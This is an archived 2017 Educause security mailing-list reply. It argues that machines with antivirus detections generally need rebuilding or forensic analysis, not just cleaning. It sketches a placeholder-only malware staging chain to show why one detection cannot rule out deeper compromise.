Educause Security Discussion mailing list archives

Re: viruses that have been cleaned or quarantined


From: Kevin Wilcox <wilcoxkm () APPSTATE EDU>
Date: Thu, 22 Jun 2017 14:39:28 -0400

On 22 June 2017 at 13:46, Frank Barton <bartonf () husson edu> wrote:

This is a touchy subject in some cases, and I think there is a certain
amount of subjectivity that needs to be brought into context.

If the infection was contained before it was able to launch/take hold (i.e.
AV prevented a file from being downloaded, or accessed after download), then
"cleaning" is somewhat of a mis-nomer. remove the infected file, and you're
all set.

This is why we have such a difficult time with teaching our users the
right way to do things. They don't want to rebuild a system so they go
online to find some argument as to why they shouldn't have to, then we
(the royal we, the InfoSec/SecOps community we) have to spend time
telling them why this comment they found on a forum or mailing list is
being interpreted incorrectly instead of just getting on with proper
remediation. It's an educational moment but unless it happens
regularly enough to sink in, most just don't absorb it - or they think
something has changed in the last six months and malware is now less
aggressive, persistent or sneaky.

Without proper process auditing and logging, the one indicator AV
found could have been the first stage dropper, the second stage
malware, the third/fourth stage crawler/persistence mechanism or it
could have been simply an indicator of a longer-running problem *and
we have no way to know* without doing a forensic deep-dive. During
that deep-dive, the system has to be offline, a specialist has to burn
time doing an analysis and it's going to take at least three times as
long as just rebuilding the thing anyway -- that said, you really
SHOULD be taking an image of RAM and disk and you SHOULD be doing an
analysis to see if it crawled around, if data was stolen or if the
attacker was able to pivot...but that's expensive+++.

If that process auditing is in place then sure, you can make the case
that <foo> user was at <w> website and <a> ad loaded and caused <d>
dropper to run that pulled the current FF domain list from <t> Twitter
post over TLS and did  <z> DNS lookup that grabbed <p> powershell from
a TXT lookup and ran by calling <l> dll versus being written to disk
and risking AV picking it up but AV triggered and blocked <t> trojan
that it downloaded and accidentally wrote to disk, and that that was
*all* that happened. That caveat *always* gets left out in the "but we
caught it on download/execution" arguments - even though it's the only
way those arguments are valid.

Odds are if you have that level of auditing and alerting in place then
you probably have other mitigations like having powershell completely
removed in your environment, full application whitelisting and
complete SSL/TLS inspection. Short of being able to get that from a
central log store, it means a forensic analysis -- because, as you
pointed out, you can't trust anything (including the logs) on the
host.

I'm curious if just *one* school on security@ has full application
whitelisting with full process auditing in their entire environment,
and can tell me whether a single request to
https://twitter.com/<malwareHandle> was malicious. Responses off-list
are fine if you don't want to advertise it, on-list would be good so
the rest of us know who to grab and flood with questions at SPC!!
Better yet, have everyone from your SecOps team put in an SPC proposal
on that topic so there's a higher chance of one of you getting to
present on it (if the 2018 committee members are reading, this is
something we desperately need either a presentation or BoF about!).

kmw


Current thread: